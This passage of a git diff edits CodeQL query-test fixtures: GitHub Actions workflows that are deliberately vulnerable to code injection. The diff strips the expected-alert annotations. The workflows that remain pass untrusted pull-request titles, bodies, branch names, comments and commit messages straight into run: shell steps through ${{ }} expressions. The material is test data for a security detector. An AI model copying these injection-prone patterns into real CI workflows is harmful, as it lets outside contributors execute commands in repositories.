$CI_BRANCH_PUSH 
@@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index 151ae685df87..dc101c769449 100644 
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number # $ Source[actions/code-injection/critical] + - name: Try to read PR number id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] - - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index e141ea55a115..f81bef89568f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.pull_request.title || "foo" }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 876141d0e17c..1e5c7eec177d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml 
@@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index df3dd6e8a11a..6d925a82d372 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" test2: runs-on: ubuntu-latest steps: 
@@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index bc06e8a525d8..a39967760e8e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
@@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index bf5346b330d5..0b3002506a14 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
@@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id # $ Source[actions/code-injection/critical] + - name: get PR id id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref # $ Source[actions/code-injection/critical] + - name: get PR ref id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } # $ Alert[actions/code-injection/critical] + } diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 712c6fb8100f..559c69c4710f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] + - name: Set PR source branch as env variable if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest 
@@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables # $ Source[actions/code-injection/critical] + - name: Set environment variables run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | # $ Source[actions/code-injection/critical] - echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- # $ Source[actions/code-injection/critical] + - run: >- echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] + \"Updated test pull request\"" && exit 1 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index ba51066def8b..552ad866b5ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file # $ Source[actions/code-injection/critical] + - name: Write issues to file run: | - echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 9ee26e0d6265..2773c1044db1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml 
@@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" - id: 
author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" - id: files run: | CHANGED_FILES=$(gh api 
/repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq 
".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" pulls3: runs-on: ubuntu-latest steps: 
@@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title1.outputs.title}}" - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title2.outputs.title}}" - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title3.outputs.title}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 5bca1705b9db..03ee63fe9cf4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 # $ Source[actions/code-injection/critical] + - name: Changed files 1 run: | - echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] + echo changed: ${{ steps.changed.outputs.locale_files }} echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 
@@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 # $ Source[actions/code-injection/critical] + - name: Changed files 2 run: | - echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] + echo changed:${{ steps.changed2.outputs.locale_files }} echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 9f906d507cfe..27d8a666fc9e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 292891b8ccb4..03ecc20de86a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml 
@@ -19,6 +19,6 @@ jobs: id: extract_info shell: bash run: | - echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] - echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] - echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml index 3661cd885a44..c1846b8f51ec 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -14,6 +14,6 @@ jobs: label_marker_start: '>>' label_marker_end: '<<' - - name: Show parsed data JSON # $ Source[actions/code-injection/critical] + - name: Show parsed data JSON run: | - echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical] + echo ${{ steps.parse.outputs.payload }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml index 5cf1093c8bbc..0bd666dc9485 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -9,5 +9,5 @@ jobs: - name: Issue Forms Body Parser id: parse uses: zentered/issue-forms-body-parser@v2.0.0 - - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] - - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml index 532ce731d104..8648d86983ee 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -17,7 +17,7 @@ jobs: - name: Fetch the issue id: read_issue_body run: - echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT - name: Issue Forms Body Parser id: parse @@ -25,5 +25,5 @@ jobs: with: body: ${{ steps.read_issue_body.outputs.body }} - - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] - - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml index 86e76277f6e9..e9ba77c0f939 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml 
